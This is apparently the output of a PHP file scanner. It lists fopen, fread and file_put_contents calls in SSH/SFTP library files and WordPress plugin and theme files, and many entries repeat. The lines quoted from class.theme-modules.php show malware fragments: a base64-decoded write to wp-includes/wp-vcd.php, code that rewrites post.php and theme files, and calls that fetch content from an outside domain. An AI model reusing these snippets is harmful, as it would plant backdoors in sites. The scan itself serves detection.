    Ligne122: @fclose($handler);
    fopen was found in the file SCP.php
    Ligne206: $fp = @fopen($data, 'rb');
    Ligne272: $fp = @fopen($local_file, 'wb');
    fread was found in the file SCP.php
    Ligne222: $temp = $mode & NET_SCP_STRING ? substr($data, $sent, $this->packet_size) : fread($fp, $this->packet_size);
    fclose was found in the file SCP.php
    Ligne233: fclose($fp);
    Ligne294: fclose($fp);
    Ligne344: fclose($this->ssh->fsock);
    fopen was found in the file SCP.php
    Ligne206: $fp = @fopen($data, 'rb');
    Ligne272: $fp = @fopen($local_file, 'wb');
    fclose was found in the file SCP.php
    Ligne233: fclose($fp);
    Ligne294: fclose($fp);
    Ligne344: fclose($this->ssh->fsock);
    fclose was found in the file SCP.php
    Ligne233: fclose($fp);
    Ligne294: fclose($fp);
    Ligne344: fclose($this->ssh->fsock);
    fclose was found in the file SSH1.php
    Ligne878: fclose($this->fsock);
    Ligne1101: fclose($this->fsock);
    fclose was found in the file SSH1.php
    Ligne878: fclose($this->fsock);
    Ligne1101: fclose($this->fsock);
    fread was found in the file SSH1.php
    Ligne1142: $temp = unpack('Nlength', fread($this->fsock, 4));
    Ligne1149: $temp = fread($this->fsock, $length);
    fread was found in the file SSH1.php
    Ligne1142: $temp = unpack('Nlength', fread($this->fsock, 4));
    Ligne1149: $temp = fread($this->fsock, $length);
    fopen was found in the file SSH1.php
    Ligne1643: // PHP doesn't seem to like using constants in fopen()
    Ligne1645: $fp = fopen($filename, 'w');
    fopen was found in the file SSH1.php
    Ligne1643: // PHP doesn't seem to like using constants in fopen()
    Ligne1645: $fp = fopen($filename, 'w');
    fopen was found in the file Stream.php
    Ligne6: * Creates an sftp:// protocol handler that can be used with, for example, fopen(), dir(), etc.
    Ligne242: user_error('fopen(): failed to call user notifier', E_USER_WARNING);
    Ligne246: on which the fopen occurred as the line number - not the line that the
    fopen was found in the file Stream.php
    Ligne6: * Creates an sftp:// protocol handler that can be used with, for example, fopen(), dir(), etc.
    Ligne242: user_error('fopen(): failed to call user notifier', E_USER_WARNING);
    Ligne246: on which the fopen occurred as the line number - not the line that the
    fread was found in the file Stream.php
    Ligne405: * fseek, fputs  / fwrite, fgets / fread and ftruncate.
    Ligne407: * Only fgets / fread, however, results in feof() returning true. do fputs($fp, 'aaa') on a
    Ligne408: * will return false. do fread($fp, 1) and feof() will then return true. do fseek($fp, 10) on ablank
    Ligne409: * will return false. do fread($fp, 1) and feof() will then return true.
    fread was found in the file Stream.php
    Ligne405: * fseek, fputs  / fwrite, fgets / fread and ftruncate.
    Ligne407: * Only fgets / fread, however, results in feof() returning true. do fputs($fp, 'aaa') on a
    Ligne408: * will return false. do fread($fp, 1) and feof() will then return true. do fseek($fp, 10) on ablank
    Ligne409: * will return false. do fread($fp, 1) and feof() will then return true.
    file_get_contents was found in the file SSH2.php
    Ligne30: *    $key->loadKey(file_get_contents('privatekey'));
    fclose was found in the file SSH2.php
    Ligne2953: fclose($this->realtime_log_file);
    Ligne3736: fclose($this->fsock);
    fread was found in the file SSH2.php
    Ligne3010: $raw = fread($this->fsock, $this->decrypt_block_size);
    Ligne3038: $temp = fread($this->fsock, $remaining_length);
    Ligne3056: $hmac = fread($this->fsock, $this->hmac_size);
    fread was found in the file SSH2.php
    Ligne3010: $raw = fread($this->fsock, $this->decrypt_block_size);
    Ligne3038: $temp = fread($this->fsock, $remaining_length);
    Ligne3056: $hmac = fread($this->fsock, $this->hmac_size);
    fread was found in the file SSH2.php
    Ligne3010: $raw = fread($this->fsock, $this->decrypt_block_size);
    Ligne3038: $temp = fread($this->fsock, $remaining_length);
    Ligne3056: $hmac = fread($this->fsock, $this->hmac_size);
    fopen was found in the file SSH2.php
    Ligne3615: // PHP doesn't seem to like using constants in fopen()
    Ligne3617: $fp = fopen($filename, 'w');
    fopen was found in the file SSH2.php
    Ligne3615: // PHP doesn't seem to like using constants in fopen()
    Ligne3617: $fp = fopen($filename, 'w');
    fclose was found in the file SSH2.php
    Ligne2953: fclose($this->realtime_log_file);
    Ligne3736: fclose($this->fsock);
    fopen was found in the file SFTP.php
    Ligne1938: $fp = @fopen($data, 'rb');
    Ligne2128: $fp = fopen($local_file, 'wb');
    fread was found in the file SFTP.php
    Ligne1972: $temp = isset($fp) ? fread($fp, $sftp_packet_size) : substr($data, $sent, $sftp_packet_size);
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fopen was found in the file SFTP.php
    Ligne1938: $fp = @fopen($data, 'rb');
    Ligne2128: $fp = fopen($local_file, 'wb');
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fclose was found in the file SFTP.php
    Ligne1982: fclose($fp);
    Ligne2004: fclose($fp);
    Ligne2011: fclose($fp);
    Ligne2137: $fclose_check = $local_file !== false && !is_resource($local_file);
    Ligne2151: if ($fclose_check) {
    Ligne2152: fclose($fp);
    Ligne2193: if ($fclose_check) {
    Ligne2194: fclose($fp);
    Ligne2214: if ($fclose_check) {
    Ligne2215: fclose($fp);
    fopen was found in the file Random.php
    Ligne101: $fp = @fopen('/dev/urandom', 'rb');
    fread was found in the file Random.php
    Ligne104: return fread($fp, $length);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fwrite was found in the file Agent.php
    Ligne472: if (strlen($this->socket_buffer) != fwrite($this->fsock, $this->socket_buffer)) {
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    fread was found in the file Agent.php
    Ligne223: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne224: $type = ord(fread($this->fsock, 1));
    Ligne229: $signature_blob = fread($this->fsock, $length - 1);
    Ligne335: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne336: $type = ord(fread($this->fsock, 1));
    Ligne342: $keyCount = current(unpack('N', fread($this->fsock, 4)));
    Ligne344: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne345: $key_blob = fread($this->fsock, $length);
    Ligne347: $length = current(unpack('N', fread($this->fsock, 4)));
    Ligne349: $key_str.= ' ' . fread($this->fsock, $length);
    Ligne479: $agent_reply_bytes = current(unpack('N', fread($this->fsock, 4)));
    Ligne481: $agent_reply_data = fread($this->fsock, $agent_reply_bytes);
    file_get_contents was found in the file parsers.php
    Ligne69: $xml_content = file_get_contents( $file );
    Ligne344: $xml_content = file_get_contents( $file );
    file_get_contents was found in the file parsers.php
    Ligne69: $xml_content = file_get_contents( $file );
    Ligne344: $xml_content = file_get_contents( $file );
    fopen was found in the file parsers.php
    Ligne518: $fp = $this->fopen( $file, 'r' );
    Ligne758: function fopen( $filename, $mode = 'r' ) {
    Ligne762: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Ligne571: $this->fclose( $fp );
    Ligne779: function fclose( $fp ) {
    Ligne783: return fclose( $fp );
    fopen was found in the file parsers.php
    Ligne518: $fp = $this->fopen( $file, 'r' );
    Ligne758: function fopen( $filename, $mode = 'r' ) {
    Ligne762: return fopen( $filename, $mode );
    fopen was found in the file parsers.php
    Ligne518: $fp = $this->fopen( $file, 'r' );
    Ligne758: function fopen( $filename, $mode = 'r' ) {
    Ligne762: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Ligne571: $this->fclose( $fp );
    Ligne779: function fclose( $fp ) {
    Ligne783: return fclose( $fp );
    fclose was found in the file parsers.php
    Ligne571: $this->fclose( $fp );
    Ligne779: function fclose( $fp ) {
    Ligne783: return fclose( $fp );
    file_get_contents was found in the file addon-management.php
    Ligne433: $addon_data      = @json_decode( file_get_contents( $value ), true );
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
